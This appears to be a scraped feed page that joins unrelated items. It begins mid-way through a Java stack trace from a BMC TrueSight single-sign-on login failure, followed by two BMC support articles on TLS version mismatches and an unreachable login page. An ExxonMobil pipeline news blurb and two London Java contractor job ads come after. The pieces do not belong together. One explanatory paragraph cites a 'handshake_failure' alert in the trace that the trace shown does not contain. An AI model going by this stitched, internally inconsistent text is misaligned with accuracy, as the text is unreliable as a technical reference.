    at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1441)
    at java.net.HttpURLConnection.getResponseCode(HttpURLConnection.java:480)
    at sun.net.www.protocol.https.HttpsURLConnectionImpl.getResponseCode(HttpsURLConnectionImpl.java:338)
    at com.bmc.atrium.sso.common.CertificateUtils.captureServerCert(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.SSOServerImpl.getHandler(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.BaseREST.sendRequest(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.BaseREST.send(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.BaseREST.sendRequest(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.BaseREST.sendGet(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.InfoREST.fetchReply(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.InfoREST.fetchReply(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.InfoREST.isFIPSMode(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.SSOServerImpl.isServerInFIPS140Mode(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.SSOServerImpl.checkFIPSCompat(Unknown Source)
    at com.bmc.atrium.sso.sdk.impl.SSOServerImpl.getAuthentication(Unknown Source)
    at com.bmc.truesight.api.auth.sso.SsoServerUtility.getAuthenticationObjectForSsoServer(SsoServerUtility.java:186)
    at com.bmc.truesight.api.auth.sso.SsoAclFacade.fetchSsoAuthenticationObject(SsoAclFacade.java:223)
    at com.bmc.truesight.api.auth.sso.SsoAclFacade.logOffUserFor(SsoAclFacade.java:525)
    at com.bmc.truesight.api.auth.sso.rest.SSOACLRestFacade.logOffUserFor(SSOACLRestFacade.java:263)
    at com.bmc.truesight.common.services.SSOServiceImpl.getSSOUserGroups(SSOServiceImpl.java:113)
    at com.bmc.truesight.usermgmt.rest.providers.servicefactory.UserAccountAuthenticationExecutionService.execute(UserAccountAuthenticationExecutionService.java:188)
    at com.bmc.truesight.usermgmt.rest.providers.UserAccountProvider.doLogin(UserAccountProvider.java:58)
    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    at java.lang.reflect.Method.invoke(Method.java:497)
    at com.bmc.truesight.rest.system.InvocationOrchestrator.invoke(InvocationOrchestrator.java:71)
    at com.sun.proxy.$Proxy108.doLogin(Unknown Source)
    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    at java.lang.reflect.Method.invoke(Method.java:497)
    at org.jboss.resteasy.core.MethodInjectorImpl.invoke(MethodInjectorImpl.java:137)
    at org.jboss.resteasy.core.ResourceMethodInvoker.invokeOnTarget(ResourceMethodInvoker.java:296)
    at org.jboss.resteasy.core.ResourceMethodInvoker.invoke(ResourceMethodInvoker.java:250)
    at org.jboss.resteasy.core.ResourceLocatorInvoker.invokeOnTargetObject(ResourceLocatorInvoker.java:140)
    at org.jboss.resteasy.core.ResourceLocatorInvoker.invoke(ResourceLocatorInvoker.java:103)
    at org.jboss.resteasy.core.SynchronousDispatcher.invoke(SynchronousDispatcher.java:356)
    at org.jboss.resteasy.core.SynchronousDispatcher.invoke(SynchronousDispatcher.java:179)
    at org.jboss.resteasy.plugins.server.servlet.ServletContainerDispatcher.service(ServletContainerDispatcher.java:220)
    at org.jboss.resteasy.plugins.server.servlet.HttpServletDispatcher.service(HttpServletDispatcher.java:56)
    at org.jboss.resteasy.plugins.server.servlet.HttpServletDispatcher.service(HttpServletDispatcher.java:51)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:729)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:291)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:239)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at com.bmc.tsps.common.services.server.HighAvailabilityFilter.doFilter(HighAvailabilityFilter.java:29)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:239)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at org.apache.shiro.web.servlet.ProxiedFilterChain.doFilter(ProxiedFilterChain.java:61)
    at org.apache.shiro.web.servlet.AdviceFilter.executeChain(AdviceFilter.java:108)
    at org.apache.shiro.web.servlet.AdviceFilter.doFilterInternal(AdviceFilter.java:137)
    at org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
    at org.apache.shiro.web.servlet.ProxiedFilterChain.doFilter(ProxiedFilterChain.java:66)
    at org.apache.shiro.web.servlet.AbstractShiroFilter.executeChain(AbstractShiroFilter.java:449)
    at org.apache.shiro.web.servlet.AbstractShiroFilter$1.call(AbstractShiroFilter.java:365)
    at org.apache.shiro.subject.support.SubjectCallable.doCall(SubjectCallable.java:90)
    at org.apache.shiro.subject.support.SubjectCallable.call(SubjectCallable.java:83)
    at org.apache.shiro.subject.support.DelegatingSubject.execute(DelegatingSubject.java:383)
    at org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:362)
    at org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:239)
    at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
    at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:212)
    at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:106)
    at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:614)
    at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:141)
    at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:79)
    at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:616)
    at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:88)
    at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:518)
    at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1096)
    at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:674)
    at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:277)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:745)
 


CAUSE:

ASSO is configured to accept only TLSv1.2, while TSPS first attempts the handshake with TLSv1.0.
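By way of illustration only (these are standard JVM system properties, but whether the TSPS launcher accepts extra JVM options this way is an assumption; the knowledge article linked in the solution describes the supported fix), a Java client that negotiates TLS through `HttpsURLConnection` can be forced to offer TLSv1.2 with:

```
-Dhttps.protocols=TLSv1.2 -Djdk.tls.client.protocols=TLSv1.2
```

Once the client and the ASSO server agree on TLSv1.2, the `handshake_failure` alert seen in the trace above should no longer occur.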


SOLUTION:

See KA 000130343 - https://bmcsites.force.com/casemgmt/sc_KnowledgeArticle?sfdcid=kA014000000l8JDCAY&type=FAQ


Article Number:

000130344


Article Type:

Solutions to a Product Problem



  Looking for additional information?    Search BMC Support  or  Browse Knowledge Articles

          Unable to reach the login page of the TrueSight Infrastructure Management server



PRODUCT:

TrueSight Infrastructure Management


COMPONENT:

TrueSight Operations Management


APPLIES TO:

Truesight Infrastructure Management Server version 10.x



PROBLEM:

We are unable to reach the login page of the TrueSight Infrastructure Management server. From the TSPS console we are able to see the events and the data. Also, the pw p l and pw lic list commands show correct output, yet the Users console is still not accessible.

In the TrueSight\pw\tomcat\logs\catalina.log file we saw this exception:

INFO  07/29 09:43:53 org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/pronto] No Spring WebApplicationInitializer types detected on classpath
INFO  07/29 09:43:53 org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/pronto] Initializing Spring root WebApplicationContext
ERROR 07/29 09:43:53 org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/pronto] Exception starting filter Agent
java.lang.NoClassDefFoundError: Could not initialize class com.bmc.atrium.sso.agents.web.SSOFilter
    at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
    at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
    at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
    at java.lang.reflect.Constructor.newInstance(Constructor.java:408)
    at java.lang.Class.newInstance(Class.java:433)
    at org.apache.catalina.core.DefaultInstanceManager.newInstance(DefaultInstanceManager.java:121)
    at org.apache.catalina.core.ApplicationFilterConfig.getFilter(ApplicationFilterConfig.java:258)
    at org.apache.catalina.core.ApplicationFilterConfig.<init>(ApplicationFilterConfig.java:105)

 


CAUSE:

Product defect QM002128714


SOLUTION:

Delete the ASSO-related log files from the /tomcat/temp folder (see the attached screenshot) and restart TSIM.


Article Number:

000118536


Article Type:

Solutions to a Product Problem




          ExxonMobil Joins Kinder Morgan, EagleClaw and Apache on Permian Highway Pipeline Project      Cache   Translate Page   Web Page Cache   
ExxonMobil signs a letter of intent; XTO Energy to be a shipper on pipeline HOUSTON–(BUSINESS WIRE)–$KMI #KinderMorgan–Kinder Morgan Texas Pipeline LLC (KMTP), a subsidiary of Kinder Morgan, Inc. (NYSE: KMI), EagleClaw Midstream Ventures, LLC (EagleClaw), a portfolio company of Blackstone Energy Partners, and Apache Corporation (NYSE, NASDAQ: APA) today announced that Exxon Mobil Corporation (NYSE: [Read More…]
          (IT) Java Developer - Microservices - 6 Month Contract

Rate: £450 - £500 per day   Location: London   

Empiric is engaged with a global client based in London to secure 3x Java/Microservices Engineers for initial 6-month contracts with immediate starts. The client is looking for elite engineers to come in and build out a greenfield platform on an exciting and fast-moving project. There is an option to work from home for the right candidate. To be right for this you must have: strong Java development experience; experience developing in a microservices architecture (Kubernetes would be an advantage); and experience with Apache Kafka and NoSQL datastores/technologies. Please apply for an urgent call back to discuss. Empiric is a global provider of niche and specialist recruitment services operating across Investment Banking, Oil & Gas, Engineering, IT and Industry & Commerce. Our expert knowledge of the market and strong working relationships with our clients have enabled us to become the preferred supplier to over 150 global corporations.
 
Rate: £450 - £500 per day
Type: Contract
Location: London
Country: UK
Contact: Empiric Solutions
Advertiser: Empiric Solutions
Start Date: ASAP
Reference: JS-DM04

          (IT) Java Security Developer - Multithreading Spring SOA Security SAML/WS Security

Rate: £550 - £650 per Day   Location: London   

Java Security Developer - Multithreading Spring SOA Security SAML/WS Security - Investment Bank. Java Security Developer with Java development experience and experience with the following: multi-threading; Spring (Core, AOP, MVC, DAO); Maven; application security (XSS, SQL/HQL/LDAP/etc. injection, XSRF); SOA security - SAML/WS-Security; API development practices, including use of Swagger; DevOps pipeline tools: Git/BitBucket, Artifactory, Jenkins, Ansible; Kerberos/SSL/TLS/PKI/GSS-API/SPNEGO. Application servers: good exposure to configuring and supporting web technologies such as Tomcat, Apache, Nginx and LDAP. Proven logical and methodical problem analysis and troubleshooting skills. Clear communicator in both written and oral forms, including specifications and architecture diagrams. Familiar with infrastructure standards for network load balancers, servers, networks and storage. Experience working with an industry-recognised service desk and project management toolset. Role: The SSO IDM team deals with support and project delivery on the identity and access management technologies: SiteMinder, LDAP, Axway gateways, ControlSA. The Java Security Developer will be part of a multi-disciplined team, providing development services for the SSO and Identity Management platforms. Adlam Consulting operates as an Employment Agency & an Employment Business.
 
Rate: £550 - £650 per Day
Type: Contract
Location: London
Country: UK
Contact: Adlam Consulting Ltd
Advertiser: Adlam Consulting Ltd
Email: Adlam.Consulting.B10DC.EF59F@apps.jobserve.com
Start Date: ASAP
Reference: JSADL02862


